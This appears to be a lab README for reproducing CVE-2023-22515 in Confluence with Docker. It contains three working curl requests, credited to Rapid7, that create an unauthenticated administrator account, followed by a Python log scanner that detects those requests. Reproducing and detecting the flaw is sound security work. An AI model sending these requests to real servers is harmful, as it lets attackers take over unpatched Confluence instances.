This vulnerability affects Confluence Server and Confluence Data Center. It allows an unauthenticated attacker to create a Confluence administrator user.
Credits for the proof-of-concept fully go to Rapid7: https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis
Run it:

```
docker-compose up
```

It takes a few minutes to start up. When you see the line `Server startup in [xx] milliseconds` in the logs:
- Browse to http://localhost:8090
- Get a trial license (this won't work without one)
- It'll take a while to configure, make sure you have 3-4 GB of RAM
- Start with an "Empty Site"
- Click on "Manage users and groups in Confluence"
- Set a sample administrator username and password
The following requests are taken from https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis

```
curl -vk "http://localhost:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
curl -vk -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=malicious-user&fullName=malicious&email=malicious%40localhost&password=malicious&confirm=malicious&setup-next-button=Next" http://localhost:8090/setup/setupadministrator.action
curl -vk -X POST -H "X-Atlassian-Token: no-check" http://localhost:8090/setup/finishsetup.action
```
After that, browse to the list of users and you'll notice that a new, malicious user has been created:
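The three requests above leave a distinctive trail in the Confluence (Tomcat) access log: a request carrying the `bootstrapStatusProvider.applicationConfig.setupComplete` parameter, followed by hits on `/setup/` actions on an instance whose setup finished long ago. The script below is an added example for the lab, not part of the Rapid7 analysis or this repository's code; it assumes common-log-format lines in which the request line includes the query string, and the log lines it scans are constructed.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample access-log lines (common log format); not captured from a real instance.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Oct/2023:10:01:02 +0000] "GET /login.action HTTP/1.1" 200 512
10.0.0.9 - - [04/Oct/2023:10:02:15 +0000] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1" 302 0
10.0.0.9 - - [04/Oct/2023:10:02:16 +0000] "POST /setup/setupadministrator.action HTTP/1.1" 302 0
10.0.0.9 - - [04/Oct/2023:10:02:17 +0000] "POST /setup/finishsetup.action HTTP/1.1" 302 0
10.0.0.7 - - [04/Oct/2023:10:05:00 +0000] "GET /rest/api/user?username=admin HTTP/1.1" 200 1023
"""

# client-ip ident user [timestamp] "METHOD target protocol" status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Setup actions that have no business being called once installation is complete.
SETUP_PATHS = ("/setup/setupadministrator.action", "/setup/finishsetup.action")
# The request parameter used to flip the instance back into "setup not complete".
SETUP_PARAM = "bootstrapStatusProvider.applicationConfig.setupComplete"


def classify(line):
    """Return a finding label for a suspicious request line, or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    path = unquote(path)
    # parse_qs decodes percent-encoded parameter names, so an encoded dot still matches.
    if SETUP_PARAM in parse_qs(query):
        return "setup-state-reset"
    if path in SETUP_PATHS:
        return "setup-endpoint-after-install"
    return None


def scan(log_text):
    """Return (client_ip, method, finding) for every suspicious line in the log text."""
    findings = []
    for line in log_text.splitlines():
        kind = classify(line)
        if kind:
            m = REQUEST_RE.match(line)
            findings.append((m.group("ip"), m.group("method"), kind))
    return findings


if __name__ == "__main__":
    for ip, method, kind in scan(SAMPLE_LOG):
        print(f"{ip} {method} {kind}")
```

A single "setup-state-reset" hit is enough to warrant checking the user list for accounts you did not create; the two setup-endpoint hits from the same client immediately afterwards match the sequence shown above.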